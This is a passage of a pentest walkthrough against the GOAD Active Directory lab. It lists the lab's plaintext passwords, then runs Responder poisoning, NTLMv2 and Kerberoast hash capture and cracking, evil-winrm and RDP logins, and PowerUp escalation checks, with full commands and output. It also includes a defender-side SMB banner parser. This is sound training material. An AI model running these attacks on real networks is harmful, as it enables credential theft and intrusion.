GOAD-WRITEUP

What is GOAD?

GOAD is an Active Directory lab environment, together with the tooling that builds it, intended for pentesting practice.

The repository itself offers a variety of environments, but this time we will cover the most basic environment: 5 VMs, 2 forests, and 3 domains.

Furthermore, since five Windows machines will be running, certain machine specifications are required.

I also prepared a Kali Linux VM for the walkthrough.

Here is my machine: Ubuntu 22.04.5 LTS, 12-core CPU, 32GB RAM.

It worked fine in my environment, so I think it will work without any problems if your machine has sufficient specs.


GOAD Credentials

Below is a table that summarizes all GOAD credentials to be used as reference:

User Domain Password Purpose Administrator on
tywin.lannister sevenkingdoms.local powerkingftw135 Lannister leader, with specific permissions (forcechangepassword).
jaime.lannister sevenkingdoms.local cersei Lannister member, with elevated permissions (GenericWrite).
cersei.lannister sevenkingdoms.local il0vejaime Administrative leader, member of Domain Admins, Lannister and Small Council. dc01 (kingslanding)
tyron.lannister sevenkingdoms.local Alc00L&S3x Lannister member, with specific permissions (Self-Membership).
robert.baratheon sevenkingdoms.local iamthekingoftheworld Administrative leader, member of Domain Admins, Baratheon and Small Council. dc01 (kingslanding)
joffrey.baratheon sevenkingdoms.local 1killerlion Member of Baratheon and Lannister, with elevated permissions (WriteDacl).
renly.baratheon sevenkingdoms.local lorastyrell Member of Baratheon and Small Council, with sensitive permissions (WriteDacl).
stannis.baratheon sevenkingdoms.local Drag0nst0ne Member of Baratheon and Small Council, with elevated permissions (GenericAll).
petyer.baelish sevenkingdoms.local @littlefinger@ Small Council member, standard role.
lord.varys sevenkingdoms.local W1sper$ Small Council member, with critical permissions (GenericAll Domain Admins).
maester.pycelle sevenkingdoms.local MaesterOfMaesters Small Council member, standard role.
arya.stark north.sevenkingdoms.local Needle Stark member, with elevated SQL permissions (impersonate dbo).
eddard.stark north.sevenkingdoms.local FightP3aceAndHonor! Administrative leader, member of Domain Admins and Stark. dc02 (winterfell)
catelyn.stark north.sevenkingdoms.local robbsansabradonaryarickon Stark member, with administrative role. dc02 (winterfell)
robb.stark north.sevenkingdoms.local sexywolfy Stark member, with exposed credentials (autologon). dc02 (winterfell)
sansa.stark north.sevenkingdoms.local 345ertdfg Stark member, with SPN (HTTP/eyrie).
brandon.stark north.sevenkingdoms.local iseedeadpeople Stark member, with SQL permissions (impersonate jon.snow).
rickon.stark north.sevenkingdoms.local Winter2022 Stark member, standard role.
hodor north.sevenkingdoms.local hodor Stark member, standard role (likely test account).
jon.snow north.sevenkingdoms.local iknownothing Member of Stark and Night Watch, with SPN (HTTP/thewall) and SQL permissions (sa).
samwell.tarly north.sevenkingdoms.local Heartsbane Night Watch member, with SQL permissions (impersonate sa).
jeor.mormont north.sevenkingdoms.local L0ngCl@w Night Watch and Mormont leader, with administrative role. srv02 (castelblack)
sql_svc (north) north.sevenkingdoms.local YouWillNotKerboroast1ngMeeeeee SQL service account for MSSQL on castelblack.
daenerys.targaryen essos.local BurnThemAll! Administrative leader, member of Domain Admins and Targaryen. dc03 (meereen)
viserys.targaryen essos.local GoldCrown Targaryen member, with specific permissions (e.g. CA manager). dc03 (meereen)
khal.drogo essos.local horse Dothraki leader, with elevated permissions (GenericAll). srv03 (braavos)
jorah.mormont essos.local H0nnor! Targaryen member, with specific permissions (GenericAll by Spys).
missandei essos.local fr3edom User with specific permissions (GenericWrite/GenericAll).
drogon essos.local Dracarys Dragons member, related to gMSA.
sql_svc (essos) essos.local YouWillNotKerboroast1ngMeeeeee SQL service account for MSSQL on braavos.



Building GOAD

We will now build the GOAD environment. There is nothing particularly difficult about it: clone the repository and run the commands below.

./goad.sh -t install -l GOAD -p virtualbox -m docker 
./goad.sh -t start -l GOAD -p virtualbox -m docker

To stop it, run the following command:

./goad.sh -t stop -l GOAD -p virtualbox -m docker

The setup will take some time, so have a cup of tea while you wait. It depends on your machine’s specs, but I personally found it took about 15 minutes for the initial setup, and about 5 minutes to start up the setup environment.

GOAD Walkthrough

Now let’s get started on conquering the GOAD machines.

This time, we aim to obtain Administrator privileges on all five machines.

All machines are deployed on the 192.168.56.0/24 network, so we proceed on that assumption.

Recon

I could explore the network with nmap or RustScan, but since we already know there are five Windows machines, let’s enumerate them with the netexec (nxc) command instead.

bolke@hacky:~$ nxc smb 192.168.56.0/24
SMB         192.168.56.12   445    MEEREEN          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         192.168.56.10   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.56.23   445    BRAAVOS          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.56.22   445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:None)
┌──(bolke㉿kali)-[~/htb]
└─$ nxc smb 192.168.56.10 --generate-hosts-file hosts
SMB         192.168.56.10   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)

┌──(bolke㉿kali)-[~/htb]
└─$ cat hosts
192.168.56.10     KINGSLANDING.sevenkingdoms.local sevenkingdoms.local KINGSLANDING
192.168.56.11     WINTERFELL.north.sevenkingdoms.local north.sevenkingdoms.local WINTERFELL
192.168.56.12     MEEREEN.essos.local essos.local MEEREEN
192.168.56.22     CASTELBLACK.north.sevenkingdoms.local CASTELBLACK
192.168.56.23     BRAAVOS.essos.local BRAAVOS

I was able to obtain a variety of information, which can be summarized as follows:

Five machines, three domains.

  • Domain: essos.local
    • meereen.essos.local (Windows Server 2016 Standard Evaluation 14393 x64)
    • braavos.essos.local (Windows Server 2016 Standard Evaluation 14393 x64)(signing:False)
  • Domain: north.sevenkingdoms.local
    • castelblack.north.sevenkingdoms.local (Windows 10 / Server 2019 Build 17763 x64)(signing:False)
    • winterfell.north.sevenkingdoms.local (Windows 10 / Server 2019 Build 17763 x64)
  • Domain: sevenkingdoms.local
    • kingslanding.sevenkingdoms.local (Windows 10 / Server 2019 Build 17763 x64)
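As an added example (not part of this writeup or of GOAD), the Python below parses the nxc smb banner lines above into the per-domain summary just written out by hand and, from the defender's side, flags the banner settings that matter for the rest of the walkthrough: hosts that do not require SMB signing (braavos, castelblack), hosts with SMBv1 still on, and hosts that accept null sessions. The sample lines are copied from the output above; the regexes and function names are mine.

```python
import re

# Constructed sample: the `nxc smb 192.168.56.0/24` lines shown above.
NXC_SMB_OUTPUT = """\
SMB         192.168.56.12   445    MEEREEN          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         192.168.56.10   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.56.23   445    BRAAVOS          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.56.22   445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:None)
"""

# Fixed columns nxc prints: protocol, ip, port, hostname, then the "[*] <os> (key:value) ..." banner.
LINE_RE = re.compile(
    r"^SMB\s+(?P<ip>\d+\.\d+\.\d+\.\d+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+"
    r"\[\*\]\s+(?P<os>.+?)\s+\(name:"
)
# Each "(key:value)" attribute in the banner; keys may contain a space ("Null Auth").
ATTR_RE = re.compile(r"\((?P<key>[^:()]+):(?P<val>[^)]*)\)")


def parse_nxc_smb(text):
    """Turn nxc smb banner lines into dicts; other lines (progress bars, auth results) are skipped."""
    hosts = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        attrs = dict(ATTR_RE.findall(line))
        hosts.append({
            "ip": m["ip"],
            "host": m["host"],
            "os": m["os"],
            "domain": attrs.get("domain", ""),
            # nxc prints True/False/None; only an explicit True counts as enabled.
            "signing": attrs.get("signing") == "True",
            "smbv1": attrs.get("SMBv1") == "True",
            "null_auth": attrs.get("Null Auth") == "True",
        })
    return hosts


def by_domain(hosts):
    """Domain -> sorted lower-case hostnames, i.e. the summary written out by hand above."""
    out = {}
    for h in hosts:
        out.setdefault(h["domain"], []).append(h["host"].lower())
    return {d: sorted(v) for d, v in out.items()}


def findings(hosts):
    """Defender-side checks on the banner; each returned tuple is (hostname, issue)."""
    issues = []
    for h in hosts:
        if not h["signing"]:
            issues.append((h["host"], "SMB signing not required; exposed to NTLM relay"))
        if h["smbv1"]:
            issues.append((h["host"], "SMBv1 still enabled"))
        if h["null_auth"]:
            issues.append((h["host"], "null (unauthenticated) session accepted"))
    return issues


if __name__ == "__main__":
    parsed = parse_nxc_smb(NXC_SMB_OUTPUT)
    for domain, names in by_domain(parsed).items():
        print(f"{domain}: {', '.join(names)}")
    for host, issue in findings(parsed):
        print(f"[!] {host}: {issue}")
```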

Next, find the server acting as the DC for each domain.

The command is as follows:

nslookup -type=srv _ldap._tcp.dc._msdcs.sevenkingdoms.local 192.168.56.10

Do this for each domain.

bolke@hacky:~$ nslookup -type=srv _ldap._tcp.dc._msdcs.sevenkingdoms.local 192.168.56.10
Server:		192.168.56.10
Address:	192.168.56.10#53

_ldap._tcp.dc._msdcs.sevenkingdoms.local	service = 0 100 389 kingslanding.sevenkingdoms.local.


bolke@hacky:~$ nslookup -type=srv _ldap._tcp.dc._msdcs.north.sevenkingdoms.local 192.168.56.10
Server:		192.168.56.10
Address:	192.168.56.10#53

Non-authoritative answer:
_ldap._tcp.dc._msdcs.north.sevenkingdoms.local	service = 0 100 389 winterfell.north.sevenkingdoms.local.

Authoritative answers can be found from:
winterfell.north.sevenkingdoms.local	internet address = 192.168.56.11


bolke@hacky:~$ nslookup -type=srv _ldap._tcp.dc._msdcs.essos.local 192.168.56.10
Server:		192.168.56.10
Address:	192.168.56.10#53

Non-authoritative answer:
_ldap._tcp.dc._msdcs.essos.local	service = 0 100 389 meereen.essos.local.

Authoritative answers can be found from:
meereen.essos.local	internet address = 192.168.56.12

Now that we have the IP addresses of the DCs for each domain, let’s add them to /etc/hosts.

┌──(kali㉿kali)-[~] 
└─$ cat /etc/hosts 
127.0.0.1 localhost 
127.0.1.1 kali 
# GOAD 
192.168.56.10 sevenkingdoms.local kingslanding.sevenkingdoms.local kingslanding 
192.168.56.11 winterfell.north.sevenkingdoms.local north.sevenkingdoms.local winterfell 
192.168.56.12 essos.local meereen.essos.local meereen 
192.168.56.22 castelblack.north.sevenkingdoms.local castelblack 
192.168.56.23 braavos.essos.local braavos 
::1 localhost ip6-localhost ip6-loopback 
ff02::1 ip6-allnodes 
ff02::2 ip6-allrouters

Responder

Now, let’s see if we can capture any authentication information using Responder.

┌──(kali㉿kali)-[~] 
└─$ sudo responder -I eth1 
                                         __ 
  .----.----.------.-----.------.-----.--| |.----.----. 
  | _| -__|__ --| _ | _ | | _ || -__| _| 
  |__| |_____|_____| __|_____|__|__|_____||_____|__| | 
                   __| 

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0 

  To support this project: 
  Github -> https://github.com/sponsors/lgandx 
  Paypal -> https://paypal.me/PythonResponder 

  Author: Laurent Gaffie (laurent.gaffie@gmail.com) 
  To kill this script hit CTRL-C 


[+] Poisoners: 
    LLMNR [ON] 
    NBT-NS [ON] 
    MDNS [ON] 
    DNS [ON] 
    DHCP [OFF] 

[+] Servers: 
    HTTP server [ON] 
    HTTPS server [ON] 
    WPAD proxy [OFF] 
    Auth proxy [OFF] 
    SMB server [ON] 
    Kerberos server [ON] 
    SQL server [ON] 
    FTP server [ON] 
    IMAP server [ON] 
    POP3 server [ON] 
    SMTP server [ON] 
    DNS server [ON] 
    LDAP server [ON] 
    MQTT server [ON] 
    RDP server [ON] 
    DCE-RPC server [ON] 
    WinRM server [ON] 
    SNMP server [OFF] 

[+] HTTP Options: 
    Always serving EXE [OFF] 
    Serving EXE [OFF] 
    Serving HTML [OFF] 
    Upstream Proxy [OFF] 

[+] Poisoning Options: 
    Analyze Mode [OFF] 
    Force WPAD auth [OFF] 
    Force Basic Auth [OFF] 
    Force LM downgrade [OFF] 
    Force ESS downgrade [OFF] 

[+] Generic Options: 
    Responder NIC [eth1] 
    Responder IP [192.168.56.104] 
    Responder IPv6 [fe80::5af0:79:dd52:80d1] 
    Challenge set [random] 
    Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL'] 

[+] Current Session Variables: 
    Responder Machine Name [WIN-YPREFKD6ZBU] 
    Responder Domain Name [NMYV.LOCAL] 
    Responder DCE-RPC Port [48610]

[+] Listening for events...                                                                                                                                                                                                                                                                                                 

[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local 
[*] [NBT-NS] Poisoned answer sent to 192.168.56.11 for name BRAVOS (service: File Server) 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos 
[SMB] NTLMv2-SSP Client : fe80::65bb:b7ff:1ad1:140 
[SMB] NTLMv2-SSP Username : NORTH\robb.stark 
[SMB] NTLMv2-SSP Hash : robb.stark::NORTH:d186ef4b2d5f70e9:0E29C7FA08D6D94EA56390D123A5A422:                                                                                                                                                                                                                                                  
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos 
[*] Skipping previously captured hash for NORTH\robb.stark
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos 
[*] Skipping previously captured hash for NORTH\robb.stark 
[*] [NBT-NS] Poisoned answer sent to 192.168.56.11 for name MEREN (service: File Server) 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren.local 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren.local 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren 
[SMB] NTLMv2-SSP Client : fe80::65bb:b7ff:1ad1:140 
[SMB] NTLMv2-SSP Username : NORTH\eddard.stark 
[SMB] NTLMv2-SSP Hash : eddard.stark::NORTH:7acc26627de9f50b:8B925C1E0C815B42E9D34D1830847365:                                                                                                                                                                                                                                                    
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren.local 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren.local
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren 
[*] Skipping previously captured hash for NORTH\eddard.stark 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren.local 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren.local 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren 
[*] Skipping previously captured hash for NORTH\eddard.stark 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local 
[*] Skipping previously captured hash for NORTH\robb.stark 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos 
[*] Skipping previously captured hash for NORTH\robb.stark 
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local 
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos 
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos 
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos 
[*] Skipping previously captured hash for NORTH\robb.stark 
[+] Exiting...

I was able to immediately obtain two NTLM hashes.

Let’s crack the hash of robb.stark.

┌──(kali㉿kali)-[~/goad/winterfell] 
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt                 
Using default input encoding: UTF-8 
Loaded 9 password hashes with 9 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) 
Will run 4 OpenMP threads 
Press 'q' or Ctrl-C to abort, almost any other key for status 
sexywolfy (robb.stark)    
6g 0:00:00:14 DONE (2024-10-06 15:40) 0.4276g/s 1022Kp/s 3622Kc/s 3622KC/s !)(OPPQR..*7¡Vamos! 
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably 
Session completed.

I was able to obtain the credentials robb.stark/sexywolfy.

Let’s use NetExec to see how far these credentials can be used.

First, SMB:

bolke@hacky:~$ nxc smb 192.168.56.10-23 -u 'robb.stark' -p 'sexywolfy'
SMB         192.168.56.12   445    MEEREEN          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.56.10   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.56.23   445    BRAAVOS          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB         192.168.56.12   445    MEEREEN          [-] essos.local\robb.stark:sexywolfy STATUS_LOGON_FAILURE 
SMB         192.168.56.22   445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:None)
SMB         192.168.56.11   445    WINTERFELL       [+] north.sevenkingdoms.local\robb.stark:sexywolfy (Pwn3d!)
SMB         192.168.56.10   445    KINGSLANDING     [-] sevenkingdoms.local\robb.stark:sexywolfy STATUS_LOGON_FAILURE 
SMB         192.168.56.23   445    BRAAVOS          [+] essos.local\robb.stark:sexywolfy (Guest)
SMB         192.168.56.22   445    CASTELBLACK      [+] north.sevenkingdoms.local\robb.stark:sexywolfy 
Running nxc against 14 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

Next, WinRM:

bolke@hacky:~$ nxc winrm 192.168.56.10-23 -u 'robb.stark' -p 'sexywolfy'
WINRM       192.168.56.10   5985   KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 (name:KINGSLANDING) (domain:sevenkingdoms.local) 
WINRM       192.168.56.12   5985   MEEREEN          [*] Windows 10 / Server 2016 Build 14393 (name:MEEREEN) (domain:essos.local) 
WINRM       192.168.56.11   5985   WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 (name:WINTERFELL) (domain:north.sevenkingdoms.local) 
WINRM       192.168.56.22   5985   CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) 
WINRM       192.168.56.23   5985   BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 (name:BRAAVOS) (domain:essos.local) 
WINRM       192.168.56.10   5985   KINGSLANDING     [-] sevenkingdoms.local\robb.stark:sexywolfy
WINRM       192.168.56.12   5985   MEEREEN          [-] essos.local\robb.stark:sexywolfy
WINRM       192.168.56.11   5985   WINTERFELL       [+] north.sevenkingdoms.local\robb.stark:sexywolfy (Pwn3d!)
WINRM       192.168.56.22   5985   CASTELBLACK      [-] north.sevenkingdoms.local\robb.stark:sexywolfy
WINRM       192.168.56.23   5985   BRAAVOS          [-] essos.local\robb.stark:sexywolfy
Running nxc against 14 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00



Winterfell Walkthrough (User Permissions)

It looks like these credentials work on WINTERFELL.

Let’s try logging in with evil-winrm-py.

git clone https://github.com/adityatelange/evil-winrm-py.git

bolke@hacky:~$ git clone https://github.com/adityatelange/evil-winrm-py.git
bolke@hacky:~/evil-winrm-py$ pipx install evil_winrm_py
  installed package evil-winrm-py 1.6.0, installed using Python 3.10.12
  These apps are now globally available
    - evil-winrm-py
    - ewp
done! ✨ 🌟 ✨


bolke@hacky:~/htb$ ewp -u robb.stark -p sexywolfy -i winterfell.north.sevenkingdoms.local
          _ _            _                             
  _____ _(_| |_____ __ _(_)_ _  _ _ _ __ ___ _ __ _  _ 
 / -_\ V | | |___\ V  V | | ' \| '_| '  |___| '_ | || |
 \___|\_/|_|_|    \_/\_/|_|_||_|_| |_|_|_|  | .__/\_, |
                                            |_|   |__/  v1.6.0

[*] Connecting to 'winterfell.north.sevenkingdoms.local:5985' as 'robb.stark'
evil-winrm-py PS C:\Users\robb.stark\Documents>

 

I was able to get in safely.

Let’s try listing the users.

C:\Users\jon.snow>net user /domain
The request will be processed at a domain controller for domain north.sevenkingdoms.local.

User accounts for \\winterfell.north.sevenkingdoms.local

-------------------------------------------------------------------------------
Administrator            arya.stark               brandon.stark
catelyn.stark            eddard.stark             Guest
hodor                    jeor.mormont             jon.snow
krbtgt                   rickon.stark             robb.stark
samwell.tarly            sansa.stark              sql_svc
vagrant
The command completed successfully.

The results are compiled in users.txt.


Kerberoasting

  • In an Active Directory environment we very often see users with an SPN set.
  • Let’s find them with Impacket:
bolke@hacky:~/htb$ GetUserSPNs.py -request -dc-ip 192.168.56.11 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -outputfile kerberoasting.hashes
Impacket v0.14.0.dev0+20260326.150834.76ee8774 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName                                 Name         MemberOf                                                    PasswordLastSet             LastLogon                   Delegation  
---------------------------------------------------  -----------  ----------------------------------------------------------  --------------------------  --------------------------  -----------
HTTP/eyrie.north.sevenkingdoms.local                 sansa.stark  CN=Stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local        2026-03-27 17:38:14.742463  <never>                                 
CIFS/thewall.north.sevenkingdoms.local               jon.snow     CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local  2026-03-27 17:38:27.015374  2026-04-06 09:36:01.306388  constrained 
HTTP/thewall.north.sevenkingdoms.local               jon.snow     CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local  2026-03-27 17:38:27.015374  2026-04-06 09:36:01.306388  constrained 
MSSQLSvc/castelblack.north.sevenkingdoms.local       sql_svc                                                                  2026-03-27 17:38:35.812323  2026-04-01 09:46:30.394085              
MSSQLSvc/castelblack.north.sevenkingdoms.local:1433  sql_svc                                                                  2026-03-27 17:38:35.812323  2026-04-01 09:46:30.394085              

All the hashes will be stored in the file named kerberoasting.hashes.

  • We could also do this with nxc, using the following command:
nxc ldap 192.168.56.11 -u brandon.stark -p 'iseedeadpeople' -d north.sevenkingdoms.local --kerberoasting KERBEROASTING

 

  • Now let’s try to crack the hashes:
hashcat -m 13100 --force -a 0 kerberoasting.hashes /usr/share/wordlists/rockyou.txt

 

  • And we found another user: jon.snow/iknownothing



We can now RDP to castelblack (192.168.56.22) as jon.snow:

xfreerdp /u:jon.snow /p:iknownothing /d:north /v:192.168.56.22 /cert-ignore

We are not an admin on castelblack, so we try PowerUp to escalate privileges, but it fails.

PS C:\Users\jon.snow\Desktop\Shared> Set-ExecutionPolicy Bypass -Scope Process

Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic at
https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes  [A] Yes to All  [N] No  [L] No to All  [S] Suspend  [?] Help (default is "N"): A
PS C:\Users\jon.snow\Desktop\Shared> . .\PowerUp.ps1
PS C:\Users\jon.snow\Desktop\Shared> Invoke-AllChecks


ModifiablePath    : C:\Users\jon.snow\AppData\Local\Microsoft\WindowsApps
IdentityReference : NORTH\jon.snow
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\jon.snow\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\jon.snow\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\jon.snow\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

UnattendPath : C:\Windows\Panther\Unattend.xml
Name         : C:\Windows\Panther\Unattend.xml
Check        : Unattended Install Files

PS C:\Users\jon.snow\Desktop\Shared>

We run PowerHuntShares.psm1:

PS C:\Users\jon.snow\Desktop\Shared> . .\PowerHuntShares.psm1
PS C:\Users\jon.snow\Desktop\Shared> Import-Module .\PowerHuntShares.psm1
PS C:\Users\jon.snow\Desktop\Shared> Invoke-HuntSMBShares

cmdlet Invoke-HuntSMBShares at command pipeline position 1
Supply values for the following parameters:
(Type !? for Help.)
OutputDirectory: c:\users\jon.snow\desktop\shared
 ===============================================================
 INVOKE-HUNTSMBSHARES
